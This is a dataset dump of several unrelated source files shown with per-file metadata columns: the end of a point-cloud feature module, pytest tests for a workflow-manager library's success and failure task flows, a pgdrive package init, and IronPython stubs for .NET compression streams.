        proj_feats = self.proj_conv(proj_feats) # B, C_new, 1, 1, np
        proj_feats = proj_feats.squeeze(3).squeeze(2) # B, C_new, np
        return new_xyz, proj_feats
| 42.78836
| 133
| 0.589217
| 1,154
| 8,087
| 3.880416
| 0.114385
| 0.075034
| 0.062528
| 0.066994
| 0.862662
| 0.849933
| 0.848146
| 0.822242
| 0.810183
| 0.798571
| 0
| 0.025718
| 0.302832
| 8,087
| 189
| 134
| 42.78836
| 0.768535
| 0.12823
| 0
| 0.728682
| 0
| 0
| 0.004356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.054264
| 0
| 0.124031
| 0.015504
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
624f5611f7f45b4c021f89f1f9039ee30510708f
| 12,646
|
py
|
Python
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 2
|
2021-09-14T17:06:46.000Z
|
2021-12-30T07:41:40.000Z
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 1
|
2018-02-08T12:36:25.000Z
|
2018-02-08T12:36:25.000Z
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 6
|
2017-09-05T19:39:53.000Z
|
2021-12-03T15:54:24.000Z
|
import example_task
from workflow_manager.manager import Manager
from workflow_manager.task import Task
def test_init():
    """A freshly constructed Manager has no flow registered."""
    manager = Manager()
    assert manager.show_flow() is None
def test_init_with_task():
    """A task passed to the constructor becomes the initial flow."""
    root = example_task.SuccessTask('task 1')
    flow = Manager(root).show_flow()
    assert flow.to_dict() == root.to_dict()
def test_register_task():
    """register_initial_task() makes the task the manager's flow.

    Fixed: the original assertion built a brand-new ``Manager(task)``
    instead of inspecting the manager that ``register_initial_task`` was
    called on, so the registration path was never actually exercised.
    """
    manager = Manager()
    task = example_task.SuccessTask('task 1')
    manager.register_initial_task(task)
    assert manager.show_flow().to_dict() == task.to_dict()
def test_workflow_with_two_items():
    """show_flow() serializes a two-node success chain."""
    first = example_task.SuccessTask('task 1')
    second = example_task.SuccessTask('task 2')
    first.on_success(second)

    manager = Manager()
    manager.register_initial_task(first)

    expected = {
        'name': 'task 1',
        'success_flow': [
            {'name': 'task 2', 'success_flow': [], 'failure_flow': []},
        ],
        'failure_flow': [],
    }
    assert manager.show_flow().to_dict() == expected
def test_workflow_with_three_items_success_failure():
    """show_flow() serializes a graph with both success and failure edges."""
    one = example_task.SuccessTask('task 1')
    two = example_task.SuccessTask('task 2')
    three = example_task.FailureTask('task 3')
    one.on_success(two)
    one.on_failure(three)
    two.on_failure(three)

    manager = Manager()
    manager.register_initial_task(one)

    # task 3 appears as the same leaf in two places of the expected tree.
    leaf = {'failure_flow': [], 'name': 'task 3', 'success_flow': []}
    expected = {
        'name': 'task 1',
        'success_flow': [
            {'failure_flow': [leaf], 'name': 'task 2', 'success_flow': []},
        ],
        'failure_flow': [leaf],
    }
    assert manager.show_flow().to_dict() == expected
def test_workflow_walking_through_successful_flow_two_nodes():
    '''
    Given:
        task 1 -> success -> task 2
        task 1 -> failure -> task 3
        task 2 -> failure -> task 3
    When:
        task 1 succeeds
        task 2 succeeds
    Then the executed workflow is:
        task 1 -> task 2
    '''
    start = example_task.SuccessTask('task 1')
    follower = example_task.SuccessTask('task 2')
    fallback = example_task.FailureTask('task 3')
    start.on_success(follower)
    start.on_failure(fallback)
    follower.on_failure(fallback)

    manager = Manager()
    manager.register_initial_task(start)
    manager.run()

    executed = manager.show_executed_flow()
    assert executed == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 2',
         'parameters': (['param', 'from', 'task', 'task 1',
                         'to', 'next', 'task'],)},
    ]
def test_workflow_walking_through_failure_flow_two_nodes_second_fail():
    '''
    Given:
        task 1 -> success -> task 2
        task 1 -> failure -> task 4
        task 2 -> success -> task 3
        task 2 -> failure -> task 4
    When:
        task 1 succeeds
        task 2 fails
    Then the executed workflow is:
        task 1 -> task 2 -> task 4
    '''
    first = example_task.SuccessTask('task 1')
    second = example_task.FailureTask('task 2')
    third = example_task.SuccessTask('task 3')
    handler = example_task.FailureTask('task 4')
    first.on_success(second)
    first.on_failure(handler)
    second.on_success(third)
    second.on_failure(handler)

    manager = Manager()
    manager.register_initial_task(first)
    manager.run()

    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 2',
         'parameters': (['param', 'from', 'task',
                         'task 1', 'to', 'next', 'task'],)},
        {'name': 'task 4',
         'parameters': (['failure message from ', 'task 2'],)},
    ]
def test_workflow_walking_through_failure_flow_two_nodes_first_fail():
    '''
    Given:
        task 1 -> success -> task 2
        task 1 -> failure -> task 4
        task 2 -> success -> task 3
        task 2 -> failure -> task 4
    When:
        task 1 fails
    Then workflow is:
        task 1 -> task 4
    '''
    task_one = example_task.FailureTask('task 1')
    task_two = example_task.SuccessTask('task 2')
    task_three = example_task.SuccessTask('task 3')
    task_four = example_task.SuccessTask('task 4')
    task_one.on_success(task_two)
    task_one.on_failure(task_four)
    task_two.on_success(task_three)
    task_two.on_failure(task_four)
    manager = Manager()
    manager.register_initial_task(task_one)
    manager.run()
    # Fixed: removed a leftover debug print(manager.show_executed_flow()).
    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 4', 'parameters': ([
            'failure message from ', 'task 1'],)}
    ]
def test_workflow_walking_through_successful_flow_list():
    '''
    Given:
        task 1 -> success -> task 2, task 3
        task 1 -> failure -> task 4
        task 2 -> success -> task 5
        task 2 -> failure -> task 6
        task 3 -> success -> task 5
        task 3 -> failure -> task 6
        task 4 -> failure -> task 6
        task 4 -> success -> task 6
    When:
        tasks 1, 2, 3 and 5 succeed
    Then the executed workflow is:
        task 1 -> task 2 -> task 5 -> task 3 -> task 5
    '''
    def handoff(source):
        # Parameters a task receives from a successful predecessor.
        return (['param', 'from', 'task', source, 'to', 'next', 'task'],)

    t1, t2, t3, t4, t5, t6 = (
        example_task.SuccessTask('task %d' % n) for n in range(1, 7))
    t1.on_success(t2, t3)
    t1.on_failure(t4)
    t2.on_success(t5)
    t2.on_failure(t6)
    t3.on_success(t5)
    t3.on_failure(t6)
    t4.on_success(t6)
    t4.on_failure(t6)

    manager = Manager()
    manager.register_initial_task(t1)
    manager.run()

    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 2', 'parameters': handoff('task 1')},
        {'name': 'task 5', 'parameters': handoff('task 2')},
        {'name': 'task 3', 'parameters': handoff('task 5')},
        {'name': 'task 5', 'parameters': handoff('task 3')},
    ]
def test_workflow_walking_through_successful_flow_list_optimized():
    '''
    Given:
        task 1 -> success -> task 2, task 3
        task 1 -> failure -> task 4
        task 2 -> success -> task 3
        task 2 -> failure -> task 6
    When:
        test 1 succeeds
        test 2 succeeds
        test 3 succeeds
    Then workflow is:
        task 1 -> task 2 -> task 3
    '''
    task_one = example_task.SuccessTask('task 1')
    task_two = example_task.SuccessTask('task 2')
    task_three = example_task.SuccessTask('task 3')
    task_four = example_task.SuccessTask('task 4')
    # Fixed: removed an unused task_five that was constructed but never
    # wired into the flow (it played no part in the scenario above).
    task_six = example_task.SuccessTask('task 6')
    task_one.on_success(task_two, task_three)
    task_one.on_failure(task_four)
    task_two.on_success(task_three)
    task_two.on_failure(task_six)
    manager = Manager()
    manager.register_initial_task(task_one)
    manager.run()
    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 2', 'parameters': (
            ['param', 'from', 'task', 'task 1',
             'to', 'next', 'task'],)},
        {'name': 'task 3', 'parameters': (
            ['param', 'from', 'task', 'task 2',
             'to', 'next', 'task'],)}
    ]
def test_workflow_walking_through_failure_flow_list():
    '''
    Given:
        task 1 -> success -> task 2, task 3
        task 1 -> failure -> task 4, task 6
        task 2 -> success -> task 5
        task 2 -> failure -> task 6
        task 3 -> success -> task 5
        task 3 -> failure -> task 6
        task 4 -> failure -> task 6
        task 4 -> success -> task 6
    When:
        task 1 fails
        task 4 succeeds
    Then the executed workflow is:
        task 1 -> task 4 -> task 6
    '''
    t1 = example_task.FailureTask('task 1')
    t2 = example_task.SuccessTask('task 2')
    t3 = example_task.SuccessTask('task 3')
    t4 = example_task.SuccessTask('task 4')
    t5 = example_task.SuccessTask('task 5')
    t6 = example_task.SuccessTask('task 6')
    t1.on_success(t2, t3)
    t1.on_failure(t4, t6)
    t2.on_success(t5)
    t2.on_failure(t6)
    t3.on_success(t5)
    t3.on_failure(t6)
    t4.on_success(t6)
    t4.on_failure(t6)

    manager = Manager()
    manager.register_initial_task(t1)
    manager.run()

    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 4',
         'parameters': (['failure message from ', 'task 1'],)},
        {'name': 'task 6',
         'parameters': (['param', 'from', 'task', 'task 4',
                         'to', 'next', 'task'],)},
    ]
def test_workflow_walking_through_failure_flow_list_different_flow():
    '''
    Given:
        task 1 -> success -> task 2, task 3
        task 1 -> failure -> task 4, task 6
        task 2 -> success -> task 5
        task 2 -> failure -> task 6
        task 3 -> success -> task 5
        task 3 -> failure -> task 6
        task 4 -> failure -> task 6
        task 4 -> success -> task 7
    When:
        test 1 fails
        test 4 succeeds
    Then workflow is:
        task 1 -> task 4 -> task 7 -> task 6
    '''
    # (docstring corrected: the asserted flow below also executes task 7 —
    # reached via task 4's success edge — before task 6 runs)
    task_one = example_task.FailureTask('task 1')
    task_two = example_task.SuccessTask('task 2')
    task_three = example_task.SuccessTask('task 3')
    task_four = example_task.SuccessTask('task 4')
    task_five = example_task.SuccessTask('task 5')
    task_six = example_task.SuccessTask('task 6')
    task_seven = example_task.SuccessTask('task 7')
    task_one.on_success(task_two, task_three)
    task_one.on_failure(task_four, task_six)
    task_two.on_success(task_five)
    task_two.on_failure(task_six)
    task_three.on_success(task_five)
    task_three.on_failure(task_six)
    task_four.on_success(task_seven)
    task_four.on_failure(task_six)
    manager = Manager()
    manager.register_initial_task(task_one)
    manager.run()
    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 4', 'parameters': (
            ['failure message from ', 'task 1'],)},
        {'name': 'task 7', 'parameters': (
            ['param', 'from', 'task', 'task 4', 'to', 'next', 'task'],)},
        {'name': 'task 6', 'parameters': (
            ['param', 'from', 'task', 'task 7', 'to', 'next', 'task'],)}
    ]
def test_workflow_walking_through_short_circuit_fail():
    '''
    Given:
        task 1 -> success -> task 2, task 3
        task 1 -> failure -> task 4
        task 2 -> success -> task 5
        task 2 -> failure -> task 6
        task 3 -> success -> task 5
        task 3 -> failure -> task 6
        task 4 -> failure -> task 6
        task 4 -> success -> task 6
    When:
        task 1 succeeds
        task 2 fails
    Then the executed workflow short-circuits to:
        task 1 -> task 2 -> task 6
    '''
    t1 = example_task.SuccessTask('task 1')
    t2 = example_task.FailureTask('task 2')
    t3 = example_task.SuccessTask('task 3')
    t4 = example_task.SuccessTask('task 4')
    t5 = example_task.SuccessTask('task 5')
    t6 = example_task.SuccessTask('task 6')
    t1.on_success(t2, t3)
    t1.on_failure(t4)
    t2.on_success(t5)
    t2.on_failure(t6)
    t3.on_success(t5)
    t3.on_failure(t6)
    t4.on_success(t6)
    t4.on_failure(t6)

    manager = Manager()
    manager.register_initial_task(t1)
    manager.run()

    assert manager.show_executed_flow() == [
        {'name': 'task 1', 'parameters': ()},
        {'name': 'task 2',
         'parameters': (['param', 'from', 'task', 'task 1',
                         'to', 'next', 'task'],)},
        {'name': 'task 6',
         'parameters': (['failure message from ', 'task 2'],)},
    ]
| 28.546275
| 73
| 0.593706
| 1,619
| 12,646
| 4.384805
| 0.039531
| 0.040147
| 0.12706
| 0.150162
| 0.935766
| 0.922524
| 0.909001
| 0.895901
| 0.863079
| 0.832089
| 0
| 0.025884
| 0.266804
| 12,646
| 442
| 74
| 28.61086
| 0.739754
| 0.167958
| 0
| 0.768924
| 0
| 0
| 0.147437
| 0
| 0
| 0
| 0
| 0
| 0.051793
| 1
| 0.051793
| false
| 0
| 0.011952
| 0
| 0.063745
| 0.003984
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62551d8ab4b1f6a8bc7d14afc452ccfa57d167cd
| 112
|
py
|
Python
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 97
|
2020-12-25T06:02:17.000Z
|
2022-01-16T06:58:39.000Z
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 192
|
2020-12-25T07:58:17.000Z
|
2021-08-28T10:13:59.000Z
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 11
|
2020-12-29T11:23:44.000Z
|
2021-12-06T23:25:49.000Z
|
from pgdrive.component.road.road import Road, Route
from pgdrive.component.road.road_network import RoadNetwork
| 37.333333
| 59
| 0.857143
| 16
| 112
| 5.9375
| 0.5
| 0.231579
| 0.421053
| 0.505263
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080357
| 112
| 2
| 60
| 56
| 0.92233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6572cedff9748de5328ffa2ce408fc6b71f6176e
| 23,741
|
py
|
Python
|
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module System.IO.Compression calls itself Compression
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class CompressionLevel(Enum, IComparable, IFormattable, IConvertible):
""" enum CompressionLevel, values: Fastest (1), NoCompression (2), Optimal (0) """
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Fastest = None
NoCompression = None
Optimal = None
value__ = None
class CompressionMode(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies whether to compress or decompress the underlying stream.
enum CompressionMode, values: Compress (1), Decompress (0)
"""
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Compress = None
Decompress = None
value__ = None
class DeflateStream(Stream, IDisposable):
"""
Provides methods and properties for compressing and decompressing streams using the Deflate algorithm.
DeflateStream(stream: Stream, mode: CompressionMode)
DeflateStream(stream: Stream, mode: CompressionMode, leaveOpen: bool)
DeflateStream(stream: Stream, compressionLevel: CompressionLevel)
DeflateStream(stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
def BeginRead(self, array, offset, count, asyncCallback, asyncState):
"""
BeginRead(self: DeflateStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous read operation.
array: The byte array to read the data into.
offset: The byte offset in array at which to begin writing data read from the stream.
count: The maximum number of bytes to read.
asyncCallback: An optional asynchronous callback, to be called when the read is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous read request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous read, which could still be
pending.
"""
pass
def BeginWrite(self, array, offset, count, asyncCallback, asyncState):
"""
BeginWrite(self: DeflateStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous write operation.
array: The buffer to write data from.
offset: The byte offset in buffer to begin writing from.
count: The maximum number of bytes to write.
asyncCallback: An optional asynchronous callback, to be called when the write is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous write request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous write, which could still be
pending.
"""
pass
def CreateWaitHandle(self, *args): # cannot find CLR method
"""
CreateWaitHandle(self: Stream) -> WaitHandle
Allocates a System.Threading.WaitHandle object.
Returns: A reference to the allocated WaitHandle.
"""
pass
def Dispose(self):
"""
Dispose(self: DeflateStream, disposing: bool)
Releases the unmanaged resources used by the System.IO.Compression.DeflateStream and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EndRead(self, asyncResult):
"""
EndRead(self: DeflateStream, asyncResult: IAsyncResult) -> int
Waits for the pending asynchronous read to complete.
asyncResult: The reference to the pending asynchronous request to finish.
Returns: The number of bytes read from the stream, between zero (0) and the number of bytes you
requested. System.IO.Compression.DeflateStream returns zero (0) only at the end of the stream;
otherwise, it blocks until at least one byte is available.
"""
pass
def EndWrite(self, asyncResult):
"""
EndWrite(self: DeflateStream, asyncResult: IAsyncResult)
Ends an asynchronous write operation.
asyncResult: A reference to the outstanding asynchronous I/O request.
"""
pass
def Flush(self):
"""
Flush(self: DeflateStream)
Flushes the contents of the internal buffer of the current stream object to the underlying
stream.
"""
pass
def MemberwiseClone(self, *args): # cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def ObjectInvariant(self, *args): # cannot find CLR method
"""
ObjectInvariant(self: Stream)
Provides support for a System.Diagnostics.Contracts.Contract.
"""
pass
def Read(self, array, offset, count):
"""
Read(self: DeflateStream, array: Array[Byte], offset: int, count: int) -> int
Reads a number of decompressed bytes into the specified byte array.
array: The array to store decompressed bytes.
offset: The byte offset in array at which the read bytes will be placed.
count: The maximum number of decompressed bytes to read.
Returns: The number of bytes that were read into the byte array.
"""
pass
def Seek(self, offset, origin):
"""
Seek(self: DeflateStream, offset: Int64, origin: SeekOrigin) -> Int64
This operation is not supported and always throws a System.NotSupportedException.
offset: The location in the stream.
origin: One of the System.IO.SeekOrigin values.
Returns: A long value.
"""
pass
def SetLength(self, value):
"""
SetLength(self: DeflateStream, value: Int64)
This operation is not supported and always throws a System.NotSupportedException.
value: The length of the stream.
"""
pass
def Write(self, array, offset, count):
"""
Write(self: DeflateStream, array: Array[Byte], offset: int, count: int)
Writes compressed bytes to the underlying stream from the specified byte array.
array: The buffer that contains the data to compress.
offset: The byte offset in array at which the compressed bytes will be placed.
count: The maximum number of compressed bytes to write.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, stream, *__args):
"""
__new__(cls: type, stream: Stream, mode: CompressionMode)
__new__(cls: type, stream: Stream, mode: CompressionMode, leaveOpen: bool)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
pass
BaseStream = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a reference to the underlying stream.
Get: BaseStream(self: DeflateStream) -> Stream
"""
CanRead = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports reading while decompressing a file.
Get: CanRead(self: DeflateStream) -> bool
"""
CanSeek = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports seeking.
Get: CanSeek(self: DeflateStream) -> bool
"""
CanWrite = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports writing.
Get: CanWrite(self: DeflateStream) -> bool
"""
Length = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Length(self: DeflateStream) -> Int64
"""
Position = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Position(self: DeflateStream) -> Int64
Set: Position(self: DeflateStream) = value
"""
class GZipStream(Stream, IDisposable):
"""
Provides methods and properties used to compress and decompress streams.
GZipStream(stream: Stream, mode: CompressionMode)
GZipStream(stream: Stream, mode: CompressionMode, leaveOpen: bool)
GZipStream(stream: Stream, compressionLevel: CompressionLevel)
GZipStream(stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
def BeginRead(self, array, offset, count, asyncCallback, asyncState):
"""
BeginRead(self: GZipStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous read operation.
array: The byte array to read the data into.
offset: The byte offset in array at which to begin writing data read from the stream.
count: The maximum number of bytes to read.
asyncCallback: An optional asynchronous callback, to be called when the read is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous read request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous read, which could still be
pending.
"""
pass
def BeginWrite(self, array, offset, count, asyncCallback, asyncState):
"""
BeginWrite(self: GZipStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous write operation.
array: The buffer containing data to write to the current stream.
offset: The byte offset in array at which to begin writing.
count: The maximum number of bytes to write.
asyncCallback: An optional asynchronous callback to be called when the write is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous write request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous write, which could still be
pending.
"""
pass
def CreateWaitHandle(self, *args): # cannot find CLR method
"""
CreateWaitHandle(self: Stream) -> WaitHandle
Allocates a System.Threading.WaitHandle object.
Returns: A reference to the allocated WaitHandle.
"""
pass
def Dispose(self):
"""
Dispose(self: GZipStream, disposing: bool)
Releases the unmanaged resources used by the System.IO.Compression.GZipStream and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EndRead(self, asyncResult):
"""
EndRead(self: GZipStream, asyncResult: IAsyncResult) -> int
Waits for the pending asynchronous read to complete.
asyncResult: The reference to the pending asynchronous request to finish.
Returns: The number of bytes read from the stream, between zero (0) and the number of bytes you
requested. System.IO.Compression.GZipStream returns zero (0) only at the end of the stream;
otherwise, it blocks until at least one byte is available.
"""
pass
def EndWrite(self, asyncResult):
"""
EndWrite(self: GZipStream, asyncResult: IAsyncResult)
Handles the end of an asynchronous write operation.
asyncResult: The System.IAsyncResult object that represents the asynchronous call.
"""
pass
def Flush(self):
"""
Flush(self: GZipStream)
Flushes the contents of the internal buffer of the current System.IO.Compression.GZipStream
object to the underlying stream.
"""
pass
def MemberwiseClone(self, *args): # cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def ObjectInvariant(self, *args): # cannot find CLR method
"""
ObjectInvariant(self: Stream)
Provides support for a System.Diagnostics.Contracts.Contract.
"""
pass
def Read(self, array, offset, count):
"""
Read(self: GZipStream, array: Array[Byte], offset: int, count: int) -> int
Reads a number of decompressed bytes into the specified byte array.
array: The array used to store decompressed bytes.
offset: The byte offset in array at which the read bytes will be placed.
count: The maximum number of decompressed bytes to read.
Returns: The number of bytes that were decompressed into the byte array. If the end of the stream has
been reached, zero or the number of bytes read is returned.
"""
pass
def Seek(self, offset, origin):
"""
Seek(self: GZipStream, offset: Int64, origin: SeekOrigin) -> Int64
This property is not supported and always throws a System.NotSupportedException.
offset: The location in the stream.
origin: One of the System.IO.SeekOrigin values.
Returns: A long value.
"""
pass
def SetLength(self, value):
"""
SetLength(self: GZipStream, value: Int64)
This property is not supported and always throws a System.NotSupportedException.
value: The length of the stream.
"""
pass
def Write(self, array, offset, count):
"""
Write(self: GZipStream, array: Array[Byte], offset: int, count: int)
Writes compressed bytes to the underlying stream from the specified byte array.
array: The buffer that contains the data to compress.
offset: The byte offset in array at which the compressed bytes will be placed.
count: The maximum number of compressed bytes to write.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, stream, *__args):
"""
__new__(cls: type, stream: Stream, mode: CompressionMode)
__new__(cls: type, stream: Stream, mode: CompressionMode, leaveOpen: bool)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
pass
BaseStream = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a reference to the underlying stream.
Get: BaseStream(self: GZipStream) -> Stream
"""
CanRead = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports reading while decompressing a file.
Get: CanRead(self: GZipStream) -> bool
"""
CanSeek = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports seeking.
Get: CanSeek(self: GZipStream) -> bool
"""
CanWrite = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports writing.
Get: CanWrite(self: GZipStream) -> bool
"""
Length = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Length(self: GZipStream) -> Int64
"""
Position = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Position(self: GZipStream) -> Int64
